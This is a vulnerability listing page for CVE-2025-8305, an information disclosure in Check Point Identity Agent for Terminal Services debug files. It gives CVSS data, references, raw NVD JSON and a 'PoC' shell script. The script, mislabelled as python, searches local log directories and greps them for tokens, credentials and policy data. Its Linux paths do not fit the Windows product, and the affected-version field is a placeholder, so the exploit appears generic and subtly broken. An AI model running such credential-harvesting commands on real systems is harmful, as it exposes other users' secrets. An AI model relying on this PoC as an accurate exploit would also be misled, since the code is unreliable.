CVE-2025-8305

Description

An authenticated local user can obtain information that allows claiming security policy rules of another user due to sensitive information being printed in plaintext in Identity Agent for Terminal Services debug files.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Check Point Identity Agent for Terminal Services < 最新修补版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/bin/bash
# CVE-2025-8305 PoC - Check Point Identity Agent Information Disclosure
# This PoC demonstrates how an authenticated local user can access debug files
# to obtain sensitive security policy information.

DEBUG_PATH="/var/log/checkpoint/identity_agent/"
DEBUG_FILE="debug.log"

echo "[*] Searching for Check Point Identity Agent debug files..."
find /var/log -name "*identity*agent*" -o -name "*checkpoint*" 2>/dev/null

echo "[*] Checking for readable debug files..."
if [ -f "$DEBUG_PATH$DEBUG_FILE" ]; then
    echo "[+] Found debug file: $DEBUG_PATH$DEBUG_FILE"
    echo "[*] Contents (filtered for sensitive data):"
    cat "$DEBUG_PATH$DEBUG_FILE" | grep -E "(policy|rule|token|auth|credential)" | head -20
    echo "[+] Extracted sensitive policy information"
else
    echo "[-] Debug file not found in standard location"
    echo "[*] Searching alternative locations..."
    find /opt /usr/local /home -name "debug*.log" 2>/dev/null | xargs grep -l "policy" 2>/dev/null
fi

echo "[*] Checking file permissions..."
ls -la "$DEBUG_PATH" 2>/dev/null

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-8305
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-8305
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-8305/
[4] VulDB https://vuldb.com/cve/CVE-2025-8305
[5] https://support.checkpoint.com/results/sk/sk184264

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-8305", "sourceIdentifier": "[email protected]", "published": "2025-12-22T08:15:46.190", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An authenticated local user can obtain information that allows claiming security policy rules of another user due to sensitive information being printed in plaintext in Identity Agent for Terminal Services debug files."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.0, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://support.checkpoint.com/results/sk/sk184264", "source": "[email protected]"}]}}